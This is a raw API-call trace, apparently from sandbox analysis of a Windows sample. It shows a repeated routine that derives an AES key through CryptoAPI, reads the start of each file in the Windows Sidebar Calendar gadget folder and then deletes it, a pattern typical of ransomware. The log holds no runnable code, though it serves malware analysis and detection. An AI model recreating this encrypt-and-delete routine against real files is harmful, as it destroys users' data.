1 [0186.235] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0186.235] CryptDestroyKey (hKey=0x284d528) returned 1 [0186.235] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.236] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\icon.png")) returned 0 [0186.238] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.239] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.239] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.239] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.240] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.240] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6a6 [0186.240] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.242] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.242] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.242] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.244] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-desk.png")) returned 0 [0186.245] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.246] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.246] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.246] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.246] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x557 [0186.246] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.249] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.249] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.249] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.251] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png")) returned 0 [0186.251] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.252] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.252] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.252] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.252] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x496 [0186.252] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.273] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.273] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.273] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.275] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png")) returned 0 [0186.276] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.277] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.277] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.277] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.277] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc9 [0186.277] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.279] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.279] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.279] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.281] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png")) returned 0 [0186.295] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.296] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.296] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.296] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.296] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x19d [0186.296] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.298] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.298] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.298] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.300] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-down.png")) returned 0 [0186.301] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.302] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.302] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.302] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.302] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x242 [0186.302] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.313] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.313] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.313] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.315] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-hot.png")) returned 0 [0186.315] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.316] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.316] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.316] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.316] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcb [0186.316] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.318] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.318] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.318] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.320] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext.png")) returned 0 [0186.321] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.322] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.322] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.322] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.322] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd9 [0186.322] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.324] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.324] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.325] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.326] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-disable.png")) returned 0 [0186.327] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.327] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.327] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.327] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.328] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x199 [0186.328] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.329] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.330] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.330] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.331] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-down.png")) returned 0 [0186.332] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.333] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.333] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.333] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.333] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x23e [0186.333] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.356] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.356] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.356] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.358] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-hot.png")) returned 0 [0186.358] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.359] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.359] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.359] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.359] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd8 [0186.359] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.361] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.361] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.361] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.363] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png")) returned 0 [0186.380] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.381] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.381] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.381] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.381] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8d6 [0186.381] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.384] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.384] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.384] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.386] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png")) returned 0 [0186.386] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.387] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.387] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.387] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.387] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbc1 [0186.387] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.390] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.390] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.390] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.392] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png")) returned 0 [0186.393] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.394] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.394] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.394] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.394] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdd5 [0186.394] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.397] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.397] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.397] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.401] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_orange.png")) returned 0 [0186.401] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.402] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.402] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.402] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.402] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbd2 [0186.402] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.405] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.405] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.405] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.407] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_ring_docked.png")) returned 0 [0186.408] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.409] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.409] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.409] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.409] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5dc [0186.409] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.424] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.425] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.425] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.426] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single.png")) returned 0 [0186.429] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.430] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.430] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.430] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.430] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdd8 [0186.430] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.445] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.446] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.446] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.447] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_bkg.png")) returned 0 [0186.448] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.449] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.449] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.449] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.449] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12a5 [0186.449] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.481] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.481] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.481] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.482] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg_orange.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_bkg_orange.png")) returned 0 [0186.483] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.483] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, 